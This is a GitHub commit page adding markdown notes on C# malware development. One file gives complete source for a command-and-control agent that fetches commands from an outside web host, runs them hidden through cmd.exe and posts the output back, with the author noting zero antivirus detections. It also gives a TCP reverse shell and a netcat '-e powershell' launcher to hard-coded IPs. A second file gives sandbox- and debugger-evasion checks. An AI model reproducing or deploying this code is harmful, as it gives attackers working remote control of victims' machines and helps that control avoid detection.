-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
4 changed files
with
360 additions
and
123 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,221 @@ | ||
--- | ||
title: C# Malware | ||
description: Introduction to C# malware dev | ||
--- | ||
|
||
# Malware | ||
|
||
## Very simple agent | ||
|
||
A very simple program that is constantly requesting a C2 using HTTPs and sending the output of commands received via POST requests. | ||
|
||
I send this malware on [VirusTotal](https://www.virustotal.com/gui/file/1d0873b354a1a9f6e80d0263ffb2ca1696e2cbb095ed101b7237b7f833599821?nocache=1) and I got 0 detection over 70 AVs. | ||
|
||
```csharp | ||
using System.Text; | ||
using System.Diagnostics; | ||
|
||
namespace Program | ||
{ | ||
class Program | ||
{ | ||
private string url; | ||
|
||
static void Main(string[] args) | ||
{ | ||
Program prog = new Program("https://yxzimlegitxyz.free.beeceptor.com"); | ||
prog.MainLoop(); | ||
} | ||
|
||
public Program (string url) | ||
{ | ||
this.url = url; | ||
} | ||
|
||
public void MainLoop() | ||
{ | ||
this.Fingerprinting(); | ||
|
||
while (true) | ||
{ | ||
this.Sleep(GenerateRandomNumber(0, 5)); | ||
|
||
string command = this.SendGetRequest(this.url + "/cmd"); | ||
string result = this.ExecuteCmd(command); | ||
this.SendPostRequest(this.url, result); | ||
} | ||
} | ||
|
||
private void Fingerprinting() | ||
{ | ||
string username = this.GetUsername(); | ||
this.SendPostRequest(this.url, username); | ||
} | ||
|
||
private int GenerateRandomNumber(int min, int max) | ||
{ | ||
return new Random().Next(min, max); | ||
} | ||
|
||
private void Sleep(int seconds) | ||
{ | ||
Thread.Sleep(seconds * 1000); | ||
} | ||
|
||
private string ExecuteCmd(string command) | ||
{ | ||
var process = new Process | ||
{ | ||
StartInfo = new ProcessStartInfo | ||
{ | ||
FileName = "cmd.exe", | ||
Arguments = $"/c {command}", | ||
UseShellExecute = false, | ||
RedirectStandardOutput = true, | ||
RedirectStandardError = true, | ||
CreateNoWindow = true | ||
} | ||
}; | ||
process.Start(); | ||
|
||
string stdout = process.StandardOutput.ReadToEnd(); | ||
string stderr = process.StandardError.ReadToEnd(); | ||
|
||
process.WaitForExit(); | ||
|
||
StringBuilder output = new StringBuilder(); | ||
output.Append(stdout); | ||
output.Append(stderr); | ||
return output.ToString(); | ||
} | ||
|
||
private string GetUsername() | ||
{ | ||
return Environment.UserName; | ||
} | ||
|
||
private string Base64Encode(string data) | ||
{ | ||
return Convert.ToBase64String(Encoding.UTF8.GetBytes(data)); | ||
} | ||
|
||
private string SendGetRequest(string url) | ||
{ | ||
HttpClient client = new HttpClient(); | ||
HttpResponseMessage response = client.GetAsync(url).Result; | ||
|
||
return response.Content.ReadAsStringAsync().Result; | ||
} | ||
|
||
public string SendPostRequest(string url, string body) | ||
{ | ||
HttpClient client = new HttpClient(); | ||
StringContent content = new StringContent( | ||
this.Base64Encode(body), | ||
Encoding.UTF8, "text/plain" | ||
); | ||
|
||
HttpResponseMessage response = client.PostAsync(url, content).Result; | ||
return response.Content.ReadAsStringAsync().Result; | ||
} | ||
} | ||
} | ||
``` | ||
|
||
## TCP Reverse shell | ||
|
||
> Source [www.revshells.com](https://www.revshells.com/). | ||
```c# | ||
using System; | ||
using System.Text; | ||
using System.IO; | ||
using System.Diagnostics; | ||
using System.ComponentModel; | ||
using System.Linq; | ||
using System.Net; | ||
using System.Net.Sockets; | ||
|
||
|
||
namespace ConnectBack | ||
{ | ||
public class Program | ||
{ | ||
static StreamWriter streamWriter; | ||
|
||
public static void Main(string[] args) | ||
{ | ||
using(TcpClient client = new TcpClient("10.200.196.200", 15555)) | ||
{ | ||
using(Stream stream = client.GetStream()) | ||
{ | ||
using(StreamReader rdr = new StreamReader(stream)) | ||
{ | ||
streamWriter = new StreamWriter(stream); | ||
|
||
StringBuilder strInput = new StringBuilder(); | ||
|
||
Process p = new Process(); | ||
p.StartInfo.FileName = "cmd.exe"; | ||
p.StartInfo.CreateNoWindow = true; | ||
p.StartInfo.UseShellExecute = false; | ||
p.StartInfo.RedirectStandardOutput = true; | ||
p.StartInfo.RedirectStandardInput = true; | ||
p.StartInfo.RedirectStandardError = true; | ||
p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler); | ||
p.Start(); | ||
p.BeginOutputReadLine(); | ||
|
||
while(true) | ||
{ | ||
strInput.Append(rdr.ReadLine()); | ||
//strInput.Append("\n"); | ||
p.StandardInput.WriteLine(strInput); | ||
strInput.Remove(0, strInput.Length); | ||
} | ||
} | ||
} | ||
} | ||
} | ||
|
||
private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine) | ||
{ | ||
StringBuilder strOutput = new StringBuilder(); | ||
|
||
if (!String.IsNullOrEmpty(outLine.Data)) | ||
{ | ||
try | ||
{ | ||
strOutput.Append(outLine.Data); | ||
streamWriter.WriteLine(strOutput); | ||
streamWriter.Flush(); | ||
} | ||
catch (Exception err) { } | ||
} | ||
} | ||
|
||
} | ||
} | ||
``` | ||
|
||
## Shell commands | ||
|
||
```csharp | ||
using System; | ||
using System.Diagnostics; | ||
|
||
namespace Example { | ||
class Program { | ||
static void Main() { | ||
Process proc = new Process(); | ||
ProcessStartInfo procInfo = new ProcessStartInfo( | ||
"c:\\Windows\\Temp\\nc.exe", | ||
"-e powershell.exe 10.50.82.172 4444" | ||
); | ||
procInfo.CreateNoWindow = true; | ||
proc.StartInfo = procInfo; | ||
proc.Start(); | ||
} | ||
} | ||
} | ||
``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,97 @@ | ||
--- | ||
title: Sandbox evasion | ||
description: Introduction to C# sandbox evasion | ||
--- | ||
|
||
# Sandbox Evasion | ||
|
||
## Sleep | ||
|
||
```csharp | ||
/** | ||
* Sleep for a certain amounts of seconds. | ||
*/ | ||
private void Sleep(int seconds) | ||
{ | ||
Thread.Sleep(seconds * 1000); | ||
} | ||
``` | ||
|
||
## Mouse is moving | ||
|
||
```csharp | ||
using System.Runtime.InteropServices; | ||
|
||
// ... | ||
[DllImport("user32.dll")] | ||
static extern bool GetCursorPos(out Point lpPoint); | ||
|
||
public Point GetMousePosition() | ||
{ | ||
GetCursorPos(out Point lpPoint); | ||
return lpPoint; | ||
} | ||
|
||
[StructLayout(LayoutKind.Sequential)] | ||
public struct Point | ||
{ | ||
public int X; | ||
public int Y; | ||
} | ||
|
||
/** | ||
* Exit the program if the position of the mouse has not changed in 30 seconds. | ||
*/ | ||
public void CheckMouseIsMoving() | ||
{ | ||
Point mousePosition = this.GetMousePosition(); | ||
this.Sleep(30); | ||
Point newMousePosition = this.GetMousePosition(); | ||
|
||
if (mousePosition.X == newMousePosition.X && | ||
mousePosition.Y == newMousePosition.Y) Environment.Exit(1337); | ||
} | ||
``` | ||
|
||
## Numbers of CPUs | ||
|
||
```csharp | ||
/** | ||
* Exit the program if the number of CPU is below or equals to 2. | ||
*/ | ||
public void CheckCPUCount() | ||
{ | ||
if (Environment.ProcessorCount <= 2) Environment.Exit(1337); | ||
} | ||
``` | ||
|
||
|
||
## Presence of Debugger | ||
|
||
```csharp | ||
using System.Diagnostics; | ||
|
||
// ... | ||
/** | ||
* Exit the program if a debugger is attached to the process. | ||
*/ | ||
public void CheckDebugger() | ||
{ | ||
if (Debugger.IsAttached) Environment.Exit(1337); | ||
} | ||
``` | ||
|
||
## Uptime | ||
|
||
```csharp | ||
/** | ||
* Exit the program if the uptime is less than 15 minutes. | ||
*/ | ||
public void CheckUptime() | ||
{ | ||
int uptime = (Environment.TickCount & Int32.MaxValue) / 1000; | ||
if (uptime / 60 < 15) Environment.Exit(1337); | ||
} | ||
``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,42 @@ | ||
--- | ||
title: Introduction to C# | ||
description: Introduction to C# | ||
--- | ||
|
||
# Introduction to C\# | ||
|
||
## Definition | ||
|
||
C# (pronounced "C-sharp") is a modern, object-oriented programming language developed by Microsoft. It was first released in 2000 as part of the .NET framework, and it is designed to be used for building a wide range of applications, from simple command-line programs to complex, enterprise-level applications. C# is a type-safe, managed language, meaning that the runtime environment automatically handles memory management and other low-level details, allowing developers to focus on writing code. C# is a statically-typed language, meaning that types are checked at compile-time rather than at runtime. This makes C# programs more efficient and less prone to runtime errors. | ||
|
||
## Build | ||
|
||
### Windows | ||
|
||
To build dotnet project you need to install [Visual Studio](https://visualstudio.microsoft.com/). | ||
|
||
MSDN : | ||
|
||
- [Single-file deployment and executable](https://learn.microsoft.com/en-us/dotnet/core/deploying/single-file/overview?tabs=cli) | ||
- [Trimming options](https://learn.microsoft.com/en-us/dotnet/core/deploying/trimming/trimming-options) | ||
|
||
Command to generate a [self-contained](https://learn.microsoft.com/en-us/dotnet/core/deploying/deploy-with-cli#self-contained-deployment) PE without symbols. | ||
|
||
```powershell | ||
dotnet publish -c Release -r win-x64 --self-contained -p:PublishSingleFile=true -p:DebugType=none -p:DebugSymbols=false -p:PublishTrimmed=true | ||
``` | ||
|
||
### Linux | ||
|
||
On Linux you can install `mono` which is a .NET compiler and runtime. | ||
|
||
Arch : `sudo pacman -S mono` | ||
|
||
Compilation : | ||
|
||
```bash | ||
$ vim Main.cs | ||
$ mcs Main.cs | ||
$ file Main.exe | ||
Main.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows | ||
``` |
Oops, something went wrong.